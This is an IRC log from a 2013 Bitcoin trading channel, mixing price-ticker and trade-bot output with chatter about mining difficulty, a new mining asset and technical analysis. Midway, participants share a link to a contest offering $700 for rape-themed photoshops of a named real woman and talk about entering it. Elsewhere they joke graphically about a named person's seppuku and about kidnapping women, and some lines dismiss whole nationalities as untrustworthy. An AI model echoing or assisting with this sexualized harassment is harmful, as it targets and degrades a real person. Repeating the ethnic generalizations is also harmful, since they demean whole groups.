0.00464 BTC [+] Mar 22 23:29:27 ;;ticker Mar 22 23:29:28 BTCUSD ticker | Best bid: 69.02127, Best ask: 70.00000, Bid-ask spread: 0.97873, Last trade: 70.00000, 24 hour volume: 73864.51626862, 24 hour low: 65.00000, 24 hour high: 73.74999, 24 hour vwap: 70.87635 Mar 22 23:32:35 meow Mar 22 23:32:43 the flash crash woke me up Mar 22 23:32:45 ;;ticker Mar 22 23:32:46 BTCUSD ticker | Best bid: 69.02230, Best ask: 69.80000, Bid-ask spread: 0.77770, Last trade: 69.80000, 24 hour volume: 74785.18483392, 24 hour low: 65.00000, 24 hour high: 73.74999, 24 hour vwap: 70.86350 Mar 22 23:32:48 mhm Mar 22 23:33:02 ;;goxlag Mar 22 23:33:02 74.29226 seconds Mar 22 23:33:07 i think its awesome that btc gets people out of bed Mar 22 23:33:41 reminds me of when I used to sleep behind the servers in the NOC Mar 22 23:34:11 (its warm back there!) lol Mar 22 23:34:20 sade to see how just a 5K dump can cut 10% Mar 22 23:34:37 error4733 that's the case pretty much across the spectrum Mar 22 23:34:46 $depth s.dice Mar 22 23:34:48 mircea_popescu: Bids: ['250 @ 0.00380002', '249 @ 0.00380002', '250 @ 0.00380001', '7000 @ 0.003308', '100 @ 0.00320005'] Mar 22 23:34:49 mircea_popescu: Asks: ['4484 @ 0.00444443', '1000 @ 0.00449999', '60000 @ 0.0045', '13055 @ 0.00499977', '1000 @ 0.00499979'] Mar 22 23:35:17 (talk about btc) Mar 22 23:35:55 i stop to hurt myslef to follow SD price Mar 22 23:36:21 i play lee than 1 instead Mar 22 23:36:43 profit for march is about 1k BTC right now Mar 22 23:36:53 ...yeaaa Mar 22 23:36:55 error4733 lol Mar 22 23:37:28 the cause is pretty much the lack of stabilisation agents. Mar 22 23:37:39 irl there's all the people doingfinancial planning, advising for clients, Mar 22 23:37:47 btc rise didn't help... Mar 22 23:37:47 referral based advertising etc Mar 22 23:37:52 https://twitter.com/PaulSproge/status/315162016232923136 Mar 22 23:37:55 this guy called it Mar 22 23:38:00 in here there's basically a bunch of coders running around like headless chickens implementing random shit Mar 22 23:38:03 that then doens't work Mar 22 23:38:04 lol smickles Mar 22 23:39:35 Err, how would that guy know unless he was the seller Mar 22 23:39:43 Or new of the sale to come Mar 22 23:39:48 knew* Mar 22 23:40:02 I guess I answered my own question really. Mar 22 23:40:11 Doffx: prolly just an elliot waver Mar 22 23:40:34 What is an elliot waver? Mar 22 23:40:47 ;;lucky elliot wave theory Mar 22 23:40:48 http://en.wikipedia.org/wiki/Elliott_wave_principle Mar 22 23:41:52 isnt that what lucif does Mar 22 23:42:04 Bowjob: that's what most all of them do Mar 22 23:42:34 how come that guy called it correctly, that lucif dude always fucks it up Mar 22 23:42:42 ;;estimate Mar 22 23:42:43 Next difficulty estimate | 6570267.53609 based on data since last change | 7684587.17947 based on data for last three days Mar 22 23:42:44 Interesting Mar 22 23:42:44 as a result, i go opposite of his forcasts Mar 22 23:42:54 it's complicated enough that people don't understand it enough that confirmation bias sets in Mar 22 23:43:00 [HAVELOCK] [SDICE] 10 @ 0.524 = 5.24 BTC [+] Mar 22 23:43:28 already back to 70 Mar 22 23:43:43 honestly i think TA mostly charlatans Mar 22 23:43:45 trading on current exchanges while dips : http://static.fjcdn.com/pictures/You_3ace5c_2337479.jpg Mar 22 23:43:52 plus, it basically says, at each key point, it can go either way Mar 22 23:43:58 it could be my own personal incredulity setting in Mar 22 23:43:58 drop 15k from your stach and drive it to 60$... Mar 22 23:44:13 ;;ticker Mar 22 23:44:14 BTCUSD ticker | Best bid: 69.23770, Best ask: 69.73998, Bid-ask spread: 0.50228, Last trade: 69.23770, 24 hour volume: 75455.72439051, 24 hour low: 65.00000, 24 hour high: 73.74999, 24 hour vwap: 70.82006 Mar 22 23:44:22 but if those TA analysts know whats going on, they wouldnt sell to ppl their subscriptions Mar 22 23:44:24 ;;market --sell 15000 Mar 22 23:44:28 A market order to sell 15000 bitcoins right now would net 966129.1306 USD and would take the last price down to 61.0000 USD, resulting in an average price of 64.4086 USD/BTC. | Data vintage: 0.0013 seconds Mar 22 23:44:56 Bowjob: rationally, yes. they would even borrow money to do it themselves Mar 22 23:45:00 [HAVELOCK] [VTX] 8 @ 0.54490001 = 4.3592 BTC [+] Mar 22 23:45:29 [BTCTC] [ASICMINER-PT] 1 @ 0.8098 BTC [-] Mar 22 23:46:49 it would even make sense for them to borrow at hight rates, b/c their profit margin would overcome it Mar 22 23:50:05 http://gma.yahoo.com/blogs/abc-blogs/man-lists-bungalow-bitcoins-115706957--abc-news-savings-and-investment.html Mar 22 23:53:59 this guy now had a nice new file open on his name with a IRS icon on top Mar 22 23:54:08 bowjob: that arguement is wrong. same reason ASIC builders wouldnt sell Mar 22 23:54:25 error4733: isn't that guy in canada? Mar 22 23:54:29 selling a TA subscription is like selling call options Mar 22 23:56:02 care to explain why that line of reasoning is included in the valuation of call options then? Mar 22 23:56:02 or more like owning a call for free? Mar 22 23:56:15 twitter fuckwits. Mar 22 23:56:22 mpex happens to have introduced shorting in btc finance, Mar 22 23:56:35 dood explains to me how im affraid of w/e the fuck. Mar 22 23:56:50 where;s this "i have no clue thus therefore i know better" attitude come from already! Mar 22 23:56:50 [MPEX] [S.MPOE] 1000 @ 0.00069242 = 0.6924 BTC [+] Mar 22 23:56:51 [MPEX] [S.MPOE] 1000 @ 0.00069242 = 0.6924 BTC [+] Mar 22 23:56:56 [MPEX] [S.MPOE] 4116 @ 0.00069241 = 2.85 BTC [-] Mar 22 23:56:57 [MPEX] [S.MPOE] 546 @ 0.00069172 = 0.3777 BTC [-] Mar 22 23:57:01 [MPEX] [S.MPOE] 8800 @ 0.00068839 = 6.0578 BTC [-] Mar 22 23:57:04 [MPEX] [S.MPOE] 2338 @ 0.0006825 = 1.5957 BTC [-] Mar 22 23:57:24 mpex finally coming off its overvaluation Mar 22 23:58:10 awww i can has 50mn ? Mar 22 23:58:43 "a bitcoin is worth $72.50? are there any smaller denominations because otherwise these things wouldn't work that well outside large transactions. i.e. I'm not buying a pizza with 1 bitcoin when it means I'm giving the pizza joint a $58 tip." Mar 22 23:58:56 "Maybe they can come up with a bitbitcoin worth $25.00 ..." Mar 22 23:59:00 [HAVELOCK] [VTX] 5 @ 0.5451 = 2.7255 BTC [+] Mar 22 23:59:14 watching clueless people talk about bitcoin Mar 22 23:59:22 i can come up with a bitcoin worth 25 usd if you'll sell it to me Mar 22 23:59:50 Bowjob ok, you win Mar 22 23:59:51 me too Mar 22 23:59:53 much worse than mine. Mar 23 00:00:18 but still... why ? Mar 23 00:00:26 "here's this thing i have no idea about. let me tell you how it goes" Mar 23 00:00:28 ow fuck me Mar 23 00:00:49 you know where all this gets started ? i bet you it's the insane habit of teaching kids to "guess" words based on context Mar 23 00:00:54 after 100$ i guess we start to talk in cents ? Cbtc Mar 23 00:00:56 rather than beat them until they learn the dictionary Mar 23 00:01:04 lol mp Mar 23 00:01:06 thats cruel Mar 23 00:01:07 :p Mar 23 00:01:10 i am serious. that's the fucking source Mar 23 00:01:28 i happened to do well in english classes back in the day Mar 23 00:01:39 english class* Mar 23 00:01:41 well shit happens when you go out of school lol Mar 23 00:01:42 mircea_popescu: yeah i dunno what that guy is on Mar 23 00:01:45 lol deadweasel Mar 23 00:01:47 he followed me too Mar 23 00:02:03 mod6 im like, dude, so go short em already Mar 23 00:02:12 "o no, too busy yakking" Mar 23 00:03:22 "Well, congress uses imaginary money, so why not?" Mar 23 00:03:28 best comment ever Mar 23 00:04:01 ""digital currency"? What's backing it? Ok, boom, I just made-up 6,000 bitcoins... keep the change!" Mar 23 00:04:13 Bowjob actually i liked this 1 https://twitter.com/pete_earle/status/315213611452731393 Mar 23 00:05:07 yeap Mar 23 00:06:46 would be pretty cool actually. Mar 23 00:07:19 i like being inside mpoebot Mar 23 00:07:21 :D Mar 23 00:07:49 $markov Mar 23 00:07:50 jurov because a. its much easier to parse and b. because the bot Mar 23 00:07:57 (15:02) < mircea_popescu> "o no, too busy yakking" << yeah like wt Mar 23 00:08:17 mpexbot is repeating itself Mar 23 00:08:47 i remember he generated exactly the same text once Mar 23 00:09:00 jurov: i think it's stopped adding new data for some reason Mar 23 00:09:02 "digital currency"? What's backing it? Ok, boom, I just made-up 6,000 bitcoins... keep the change! Mar 23 00:09:13 it's not a priority for me to figure it out Mar 23 00:09:42 bowjobbot is repeating itself Mar 23 00:09:48 oh did i Mar 23 00:09:49 lol Mar 23 00:09:51 that pete earle guy has it figured ou though Mar 23 00:09:51 i guess [\\\] borkt it... cause of the backlashes Mar 23 00:10:02 yes i did Mar 23 00:10:12 jurov: heh, that would be funny actually Mar 23 00:10:32 little imsa tables we call him Mar 23 00:11:11 oh wow, Mar 23 00:11:25 I dreamt that I got an asic, and I found a block Mar 23 00:11:27 mpoebot is widening margins by leaps and bounds Mar 23 00:11:32 then I woke up Mar 23 00:11:33 lol Mar 23 00:12:19 ;;ticker Mar 23 00:12:20 BTCUSD ticker | Best bid: 70.30000, Best ask: 70.40000, Bid-ask spread: 0.10000, Last trade: 70.30000, 24 hour volume: 75252.45726239, 24 hour low: 65.00000, 24 hour high: 73.74999, 24 hour vwap: 70.77809 Mar 23 00:13:31 flash crash? Mar 23 00:13:36 we all iz po nao? Mar 23 00:13:42 no doubt, benkay Mar 23 00:13:58 deadweasel u still at work? Mar 23 00:14:10 come hang out at bailey's, cuz Mar 23 00:14:10 no, the woman is on the phone with her mother. Mar 23 00:14:22 yeah, bears got trampled upon once again Mar 23 00:15:12 how can you talkto your mother for that long?~?! Mar 23 00:15:15 is there a channel for humans writing bitcoin software? Mar 23 00:15:23 i don't mean bitcoin-dev Mar 23 00:15:29 nice save Mar 23 00:15:40 dude Mar 23 00:15:44 the pedants in this area Mar 23 00:15:57 i believe proudhon saved us from the crash.. he called BTC dropping Mar 23 00:20:14 guys.. does anyone recall bfl josh saying he will commit seppuku if bfl asics dont get delivered by april? Mar 23 00:24:07 Aha, found it Mar 23 00:24:08 https://forums.butterflylabs.com/bfl-forum-miscellaneous/632-getting-ready-april.html Mar 23 00:24:16 misspelled seppuku, Mar 23 00:24:23 [BTCTC] [GSDPT] 1 @ 0.00443 BTC [+] Mar 23 00:24:26 [BTCTC] [GSDPT] 10 @ 0.00444 = 0.0444 BTC [+] Mar 23 00:25:08 [BTCTC] [BITVPS] 100 @ 0.006 = 0.6 BTC [+] Mar 23 00:25:15 [BTCTC] [ASICMINER-PT] 2 @ 0.8098 = 1.6196 BTC [-] Mar 23 00:29:08 ;;ticker Mar 23 00:29:09 BTCUSD ticker | Best bid: 69.50001, Best ask: 69.76622, Bid-ask spread: 0.26621, Last trade: 69.50000, 24 hour volume: 76705.51077553, 24 hour low: 65.00000, 24 hour high: 73.74999, 24 hour vwap: 70.74349 Mar 23 00:29:15 ;;goxlag Mar 23 00:29:15 0 seconds Mar 23 00:29:18 haha " You wouldn't have to commit Seppeku. You'd have an angry mob with pitchforks and flaming torches at the door....." Mar 23 00:32:41 he still has time i guess :/ Mar 23 00:33:24 so basically we need to have him take a bath, Mar 23 00:33:34 and we feed him his favourite food Mar 23 00:33:51 then after that he performs hara kiri Mar 23 00:34:04 we need a skilled swordsman as his second though... Mar 23 00:34:34 i thinks a rafle for this joob is good idea Mar 23 00:34:48 to many pp want the job Mar 23 00:35:20 well, they need to perform it correctly. basically you want to cut his head, but with a little bit of flash left so that his head wont roll Mar 23 00:35:35 since apparently heads rolling is unsightly in front of spectators and not graceful Mar 23 00:35:42 challenge accepted Mar 23 00:36:58 he has to stab himself from left, dragging the knife to his right,.. and pulling up his abdomen. after which, the pain would be so unbearable, that he would naturally elongate his neck for the swordsman Mar 23 00:37:44 if anyone has the photochop skills : http://trilema.com/2013/rape-is-fun-or-lets-fuck-up-adria-richards/ Mar 23 00:39:59 hrm Mar 23 00:39:59 [HAVELOCK] [VTX] 3 @ 0.545088 = 1.6353 BTC [-] Mar 23 00:40:00 [HAVELOCK] [VTX] 3 @ 0.545099 = 1.6353 BTC [+] Mar 23 00:40:01 [HAVELOCK] [VTX] 2 @ 0.5451 = 1.0902 BTC [+] Mar 23 00:40:07 does it have to be obviously RAPE Mar 23 00:40:16 rather than getting fukd Mar 23 00:40:25 [BTCTC] [ASICMINER-PT] 3 @ 0.8 = 2.4 BTC [-] Mar 23 00:40:40 ThickAsThieves well, it's a contest Mar 23 00:40:43 so far no entrants, so... Mar 23 00:40:52 hehe Mar 23 00:40:56 i have the chops.... Mar 23 00:41:13 wow a 700 dollar reward? Mar 23 00:41:29 challenge accepted Mar 23 00:41:33 go for it. Mar 23 00:42:01 lol at your wife checking your history and seeing "rape picz" Mar 23 00:42:45 lol at anyone who has women in their life who are privileged to review history Mar 23 00:43:05 im not married. Mar 23 00:52:59 ;;ticker Mar 23 00:53:00 BTCUSD ticker | Best bid: 68.71999, Best ask: 68.72000, Bid-ask spread: 0.00001, Last trade: 68.72000, 24 hour volume: 77413.54084361, 24 hour low: 65.00000, 24 hour high: 73.74999, 24 hour vwap: 70.70434 Mar 23 01:02:50 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199999 BTC [+] Mar 23 01:03:55 [MPEX] [O.BTCUSD.C310T] 2 @ 0.56246444 = 1.1249 BTC [+] Mar 23 01:04:02 [BTCTC] [BASIC-MINING] 3 @ 0.34 = 1.02 BTC [+] Mar 23 01:04:46 mp : good on you !! Mar 23 01:05:04 ;;goxlag Mar 23 01:05:04 3.936888 seconds Mar 23 01:06:44 [BTCTC] [GSDPT] 35 @ 0.00448 = 0.1568 BTC [+] Mar 23 01:06:48 [BTCTC] [GSDPT] 1 @ 0.00449 BTC [+] Mar 23 01:06:51 [BTCTC] [GSDPT] 5 @ 0.004587 = 0.0229 BTC [+] Mar 23 01:06:53 [BTCTC] [GSDPT] 1 @ 0.004636 BTC [+] Mar 23 01:07:31 ;;calc 31/(1-.5624) Mar 23 01:07:32 70.8409506399 Mar 23 01:07:57 [MPEX] [S.MPOE] 6700 @ 0.00068477 = 4.588 BTC [+] Mar 23 01:07:59 [MPEX] [S.MPOE] 7662 @ 0.0006825 = 5.2293 BTC [-] Mar 23 01:08:00 [MPEX] [S.MPOE] 788 @ 0.00068249 = 0.5378 BTC [-] Mar 23 01:09:02 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] Mar 23 01:09:57 ;;bc,stats Mar 23 01:09:58 Current Blocks: 227471 | Current Difficulty: 4847647.152065606 | Next Difficulty At Block: 227807 | Next Difficulty In: 336 blocks | Next Difficulty In About: 1 day, 10 hours, 54 minutes, and 32 seconds | Next Difficulty Estimate: 6569364.63317 | Estimated Percent Change: 35.51656 Mar 23 01:10:09 [BTCTC] [ASICMINER-PT] 1 @ 0.8097 BTC [+] Mar 23 01:11:01 so do you guys think the trend of btc rising with mining diff will hold as we spike higher on diff? Mar 23 01:11:15 [BTCTC] [ASICMINER-PT] 2 @ 0.8097 = 1.6194 BTC [+] Mar 23 01:12:21 if anything price lags behind diff as the miners try to sell at profitable rates, but for a while, i think most miners have not been cashing out. so it's not a good metric Mar 23 01:13:20 [BTCTC] [ASICMINER-PT] 2 @ 0.8097 = 1.6194 BTC [+] Mar 23 01:14:41 that sorta means it goes up either way, no? of course that's been the best guess for a while now... Mar 23 01:14:43 [BTCTC] [COGNITIVE] 7 @ 0.16 = 1.12 BTC [+] Mar 23 01:17:44 well, everytime since ~jul 2011, when it gets this profitable to mine, it begins to be a lot less profitable to mine. caused by eithr diff increase or price drop. since we expect the diff to increase, the price may stabilize Mar 23 01:18:27 maybe it works like this because large mine-ops want to exptect and force a given profit leve once they startup Mar 23 01:19:51 maybe 65-75 will be the range for a while Mar 23 01:22:33 maybe. Mar 23 01:27:17 hi all Mar 23 01:27:41 ekki Mar 23 01:27:43 ello* Mar 23 01:27:57 what's new mircea_popescu Mar 23 01:28:04 nothing much really. Mar 23 01:28:36 cool Mar 23 01:30:10 what's the btc-assets downlow on this bullshit: https://www.privateinternetaccess.com/blog/2012/03/bitcoin-war-the-first-real-threat-to-bitcoin/ Mar 23 01:30:26 $vwap s.mpoe Mar 23 01:30:28 mod6: 1 day: average: 0.00069382 high: 0.00072101 low: 0.00068249 volume: 79772 btc: 55.34760872 7 day: average: 0.00071976 high: 0.00077505 low: 0.00066743 volume: 3194689 btc: 2299.41829871 30 day: average: 0.00071193 high: 0.00078628 low: 0.00061614 volume: 35374137 btc: 25183.935095 Mar 23 01:31:53 "1. The entity may have discovered a method for increasing mining ROI, and essentially, is earning its 50 bitcoins per block" Mar 23 01:31:53 benkay: fearmongering Mar 23 01:31:55 i stopped there. Mar 23 01:33:05 what's the deal with the empty txns tho Mar 23 01:33:22 couldnt they just further develop the stabdard bitcoin client to mine again, except take it further than cgminer, make it even easier to use and autodetect GPU/CPU power etc Mar 23 01:33:32 then we could have Red Alerts when shit went down Mar 23 01:33:39 and tell everyone to start mining Mar 23 01:33:48 if they wanna save bitcoin Mar 23 01:33:49 etc Mar 23 01:34:09 not entirely a bad idea Mar 23 01:34:54 could be they just don't like the community. Mar 23 01:35:21 that guy is smoking crack Mar 23 01:35:39 because its not all bots, i know for sure, because im not a bot - at least I don't think i am... Mar 23 01:35:57 my ISP thinks i have a bot infection Mar 23 01:36:01 when i started mining Mar 23 01:36:11 i got an email from comcast Mar 23 01:36:11 haha Mar 23 01:36:33 mod6 he's talking about the 15% miner that used to make empty blocks Mar 23 01:37:02 It essentially was warning that one of my computers may have been compromised and is exhibiting bot activity Mar 23 01:37:12 oh we're talkin bout different things -- im talking about that twitter dillhole Mar 23 01:37:51 also the idea of giving every bitcoiner mining power, ties in well with the idea of letting people mine to expedite their own transactions Mar 23 01:38:07 have a little mining power in cellphone app, etc Mar 23 01:38:15 hahahaha Mar 23 01:38:17 oh Mar 23 01:38:18 haha Mar 23 01:38:19 man Mar 23 01:38:23 and zero battery instantly Mar 23 01:38:52 ThickAsThieves: it would would probably have a very small impact Mar 23 01:39:04 probably, Mar 23 01:39:12 but that impact may be able to stay proportional Mar 23 01:39:19 as bitcoin uptake increases in the world Mar 23 01:39:44 it would waste people's electricity and longevity of their computers Mar 23 01:40:11 let em get rewards too then Mar 23 01:40:21 pool em Mar 23 01:40:26 just ideas Mar 23 01:40:29 they would, and it would still be a waste ;) Mar 23 01:40:47 while none of this is perfect Mar 23 01:41:03 i do think this kind of thinking can help mitigate the problem Mar 23 01:41:31 for example Mar 23 01:41:38 asics seem all powerful now Mar 23 01:41:53 but maybe every cell phone gets a couple 5th gen asic chips Mar 23 01:41:54 I had a great talk last night with Yifu Mar 23 01:42:13 there will be a next wave of more optimized Mar 23 01:42:20 better chips Mar 23 01:42:42 someone will do it Mar 23 01:43:04 "Later update : The article originally used the word “photochop”. This is wrong, because the more photoshop is consistently used the closer Adobe gets to losing that trademark through it becoming generic. Please help the effort of stripping Adobe of its assets by always referring to altered images as “photoshops” rather than anything else. Thanks." Mar 23 01:43:09 we can get rid of bluetooth to make room Mar 23 01:43:13 :) Mar 23 01:43:50 that's cool Mar 23 01:52:09 a new asset launched: https://bitfunder.com/asset/AMC Mar 23 01:53:37 wow and how the fuck am i supposed to know from the bitfunder website what this so-called "asset" actually is? Mar 23 01:54:02 [MPEX] [S.MPOE] 18728 @ 0.0007121 = 13.3362 BTC [+] Mar 23 01:54:37 benkay: details tab Mar 23 01:54:41 click Profile Mar 23 01:54:47 then click Description Mar 23 01:54:50 profiles, even Mar 23 01:55:08 apparently he took the sell down to fix it Mar 23 01:55:32 using Bitcoins to talk about bitcoins Mar 23 01:55:34 super profesh Mar 23 01:56:01 "we will also be buying shares of asic miner as they become reasonably priced" Mar 23 01:56:02 yo dawhg Mar 23 01:56:06 i herd u liked gambling Mar 23 01:56:21 heh, its their choice Mar 23 01:56:28 most things in bitcoin world are gambling Mar 23 01:56:36 exchanging, etc Mar 23 01:56:43 rly? Mar 23 01:56:44 of some form or another Mar 23 01:56:48 bitcoins have inherent value tho bro Mar 23 01:56:56 yeah, sell it one day Mar 23 01:56:59 the next day its double value Mar 23 01:56:59 [HAVELOCK] [SDICE] 5 @ 0.4940001 = 2.47 BTC [-] Mar 23 01:57:00 [HAVELOCK] [SDICE] 20 @ 0.49400001 = 9.88 BTC [-] Mar 23 01:57:02 you can't gamble with a thing's inherent value Mar 23 01:57:07 nvm Mar 23 01:57:18 that was going to take too much energy. Mar 23 01:57:25 probably. :) Mar 23 02:04:38 ;;ticker Mar 23 02:04:39 BTCUSD ticker | Best bid: 69.75500, Best ask: 69.99999, Bid-ask spread: 0.24499, Last trade: 69.99999, 24 hour volume: 73192.71947822, 24 hour low: 65.00000, 24 hour high: 73.74999, 24 hour vwap: 70.64505 Mar 23 02:04:52 ;;market --sell 15000 Mar 23 02:04:55 A market order to sell 15000 bitcoins right now would net 974132.1233 USD and would take the last price down to 62.0000 USD, resulting in an average price of 64.9421 USD/BTC. | Data vintage: 0.0018 seconds Mar 23 02:05:12 ;;goxlag Mar 23 02:05:13 0 seconds Mar 23 02:05:23 ;;bids 75 Mar 23 02:05:24 There are currently 0 bitcoins demanded at or over 75.0 USD, worth 0.0 USD in total. | Data vintage: 28.0741 seconds Mar 23 02:05:30 ;;asks 75 Mar 23 02:05:31 There are currently 18428.25 bitcoins offered at or under 75.0 USD, worth 1356900.05522 USD in total. | Data vintage: 35.7716 seconds Mar 23 02:05:45 jurov: wth? Mar 23 02:06:12 go to https://bitfunder.com/asset/AMC, click Options tab Mar 23 02:06:20 oh, those kind of options Mar 23 02:10:58 jurov, you expect AMC to keel over? Mar 23 02:13:44 just waiting for some reaction Mar 23 02:14:05 but they indeed have some right ingredients Mar 23 02:14:09 [BTCTC] [PAJKA.BOND] 20 @ 0.09 = 1.8 BTC [-] Mar 23 02:15:26 right ingredients for what? Mar 23 02:15:31 keeling Mar 23 02:15:33 to keel over Mar 23 02:15:45 just checking Mar 23 02:15:51 what ingredients tripped your filters? Mar 23 02:16:34 for example Mar 23 02:16:48 "The team has been involved with the Bitcoin project since 2009" Mar 23 02:16:56 but no url, website, project, anything Mar 23 02:17:03 they want SO much money Mar 23 02:17:14 with so little to show Mar 23 02:17:42 benkay such things really needs explanation? Mar 23 02:17:48 mpoe-pr sez, get in the wot, build your history Mar 23 02:17:50 people know better Mar 23 02:17:59 two years later it's "we've been lurking since two years ago" Mar 23 02:18:04 "prove it" "uhhhh" Mar 23 02:18:15 i'm always interested in hearing about others' filters Mar 23 02:18:22 i have my own Mar 23 02:18:47 but the cool thing about mental immune systems is that they peer-bootstrap Mar 23 02:18:51 *shrug* Mar 23 02:21:09 benkay they're also difficult to package into words. Mar 23 02:21:31 zomg writings r hard Mar 23 02:21:31 AMC stands above all others as the most trusted ASIC Bitcoin Mining Cooperative and ASIC Developer. Mar 23 02:21:41 i kid, i kid. Mar 23 02:21:42 all scammers are full of trust Mar 23 02:22:12 i think the word "trust" isn't even mentioned on coinbr website for example, quite the opposite Mar 23 02:22:23 we just deliver Mar 23 02:22:40 cavritex up close to 30% Mar 23 02:22:41 bullshit talks Mar 23 02:22:43 :) Mar 23 02:22:46 since ipo Mar 23 02:23:00 not calling your shop bullshit, jurov. describing actions of actors in community. Mar 23 02:23:25 no, i was not implying that Mar 23 02:23:51 he has a point tho. narcissism, niceness and all the rest of the social proof stuff correlates with social engineers. Mar 23 02:25:21 the close on that quote is "gangsters walk" Mar 23 02:25:23 anytime anyone says 'thank you' they are just trying to get you to do more shit for them in the future :P Mar 23 02:25:33 duh Mar 23 02:25:34 hahaha Mar 23 02:25:42 why do you think I thank everyone for the things they do for me? Mar 23 02:25:44 manipulative bastards Mar 23 02:26:06 today waitress gave me check, made change, i refused it and instead of thank you Mar 23 02:26:07 it's just manners, man Mar 23 02:26:11 she said "i love you" Mar 23 02:26:15 point in case. Mar 23 02:26:25 you probably tipped something absurd Mar 23 02:26:31 not rly. Mar 23 02:26:35 but tips are rare here. Mar 23 02:26:58 oh, it's manners? so you are trying to put yourself in a seperate class :< Mar 23 02:27:03 (also i've been there miltiple times but this iirc was the first time when i was alone) Mar 23 02:27:12 there are already separate classes, smickles Mar 23 02:27:14 some are born into them, Mar 23 02:27:15 above me! ha! i has no manners Mar 23 02:27:17 others have to learn. Mar 23 02:27:22 some never do. Mar 23 02:27:24 it's all just signaling Mar 23 02:27:32 smickles old woman! who is your lord ? Mar 23 02:28:21 [MPEX] [S.MPOE] 1013 @ 0.0007121 = 0.7214 BTC [+] Mar 23 02:28:22 [MPEX] [S.MPOE] 25685 @ 0.00070622 = 18.1393 BTC [-] Mar 23 02:28:23 in all srsness, manipulating people that way is almost always benificial and should be done Mar 23 02:28:26 [MPEX] [S.MPOE] 11900 @ 0.00068941 = 8.204 BTC [-] Mar 23 02:29:16 it might even be such a good thing that it's why our species has done well Mar 23 02:29:23 *partly why Mar 23 02:29:31 incidentally, why do people say "let's do it again sometime" instead of "thank you" :D Mar 23 02:29:35 look at the bitcoinland Mar 23 02:29:39 we are not doing well at all! Mar 23 02:29:46 kakobrekla ty. Mar 23 02:29:53 fuckin monkeys. Mar 23 02:30:08 ah stfu mp :D Mar 23 02:30:12 mircea_popescu: they probably just mean the same thing Mar 23 02:30:28 or they are just letting the matrix slip out a little Mar 23 02:30:31 see, kako is manipulating me into having sex with his gf. Mar 23 02:30:34 so to speak Mar 23 02:30:48 hehe Mar 23 02:30:55 glwt Mar 23 02:31:15 oh, that reminds me Mar 23 02:31:22 poor ms smickles. Mar 23 02:31:37 mircea_popescu: my wife declined your invitation to romania for sex dungeon activities Mar 23 02:31:42 o.o Mar 23 02:32:06 hehe Mar 23 02:32:07 wait. i forgot all about this. when was she scheduled to appear ? Mar 23 02:32:35 well, considering it was a joke, i don't think we made solid arrangements Mar 23 02:32:52 a joke, he says. Mar 23 02:33:24 prolly her loss anyway Mar 23 02:33:26 Mar 22 19:44:50 99% of the time you're serious Mar 23 02:33:29 ^ Mar 23 02:34:13 now im gonna have to call my berber connection, kidnam moar circassian chix Mar 23 02:34:41 [BTCTC] [BTC-BOND] 3 @ 0.009899 = 0.0297 BTC [+] Mar 23 02:36:37 [BTCTC] [B.YABMC] 1 @ 0.01989 BTC [+] Mar 23 02:36:54 [BTCTC] [B.YABMC] 1 @ 0.0199 BTC [+] Mar 23 02:42:15 [MPEX] [S.MPOE] 10794 @ 0.00068613 = 7.4061 BTC [-] Mar 23 02:44:53 [BTCTC] [ASICMINER-PT] 6 @ 0.8096 = 4.8576 BTC [-] Mar 23 02:58:33 AMC CEO/CTO, Kenneth(Ken) E. Slaughter - that's true name? Mar 23 02:59:50 kinda common name Mar 23 03:08:20 [BTCTC] [COGNITIVE] 1 @ 0.15 BTC [-] Mar 23 03:10:33 [BTCTC] [S.DICE-PT] 10 @ 0.00404 = 0.0404 BTC [-] Mar 23 03:10:35 [BTCTC] [S.DICE-PT] 1 @ 0.00403 BTC [-] Mar 23 03:10:37 [BTCTC] [S.DICE-PT] 20 @ 0.00402 = 0.0804 BTC [-] Mar 23 03:13:31 [BTCTC] [BTC-BOND] 1 @ 0.009899 BTC [+] Mar 23 03:15:47 heh Mar 23 03:15:55 "no salaries will be paid as an expense" Mar 23 03:16:33 don't trust anyone from Argentina or Brazil; or Russia or Ukraine, etc. Mar 23 03:16:33 don't trust anyone from Florida Mar 23 03:16:37 lol jcpham Mar 23 03:16:56 why not china ? Mar 23 03:18:37 "a good deal is rarely time sensitive." that's plain untrue. Mar 23 03:18:52 gotcha Mar 23 03:18:56 http://www.linkedin.com/profile/view?id=80003437&authType=NAME_SEARCH&authToken=z8WH&locale=en_US&srchid=e8237cef-3548-4ffc-9811-1de442f6ebcb-0&srchindex=6&srchtotal=24&goback=%2Efps_PBCK_*1_Ken_Slaughter_*1_*1_*1_*1_*2_*1_Y_*1_*1_*1_false_1_R_*1_*51_*1_*51_true_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2_*2&pvs=ps&trk=pp_profile_name_link Mar 23 03:19:41 [BTCTC] [ASICMINER-PT] 7 @ 0.8096 = 5.6672 BTC [-] Mar 23 03:20:16 homie has 3 linkedin connections Mar 23 03:20:41 a self-described "experienced software executive" Mar 23 03:21:09 he may actually have some cloud experience Mar 23 03:21:22 ahh, the executive. Mar 23 03:21:41 you know they have "Executive toilets" in the states now ? Mar 23 03:21:43 "I have people for that" Mar 23 03:21:48 nudge nudge mp Mar 23 03:21:52 unlike the common toilets, these are really executive Mar 23 03:22:10 they bring a new level of professionalism to executing your movements Mar 23 03:22:20 + they have experience Mar 23 03:23:04 [BTCTC] [ASICMINER-PT] 1 @ 0.8096 BTC [-] Mar 23 03:23:21 "For this type of service (and most others) #bitcoin-otc is old and completely irrelevant." Mar 23 03:23:25 why the butthurt ? Mar 23 03:23:59 [HAVELOCK] [VTX] 1 @ 0.5499 BTC [+] Mar 23 03:27:51 bitcoin-otc is currently involved in a biblical discussion Mar 23 03:27:54 amc may have a point Mar 23 03:28:36 mircea: romania needs to be added to that list Mar 23 03:30:03 so Mar 23 03:30:09 given the state of the crap that is otc Mar 23 03:33:00 [MPEX] [S.MPOE] 5400 @ 0.00068249 = 3.6854 BTC [-] Mar 23 03:34:58 [HAVELOCK] [SDICE] 2 @ 0.528999 = 1.058 BTC [+] Mar 23 03:39:33 totally. Mar 23 03:42:34 !r unbalanced_away Mar 23 04:02:24 ;;ticker Mar 23 04:02:25 BTCUSD ticker | Best bid: 69.12739, Best ask: 69.48999, Bid-ask spread: 0.36260, Last trade: 69.12740, 24 hour volume: 71874.62529399, 24 hour low: 65.00000, 24 hour high: 73.74999, 24 hour vwap: 70.57386 Mar 23 04:06:38 [BTCTC] [BASIC-MINING] 2 @ 0.34 = 0.68 BTC [+] Mar 23 04:16:58 [HAVELOCK] 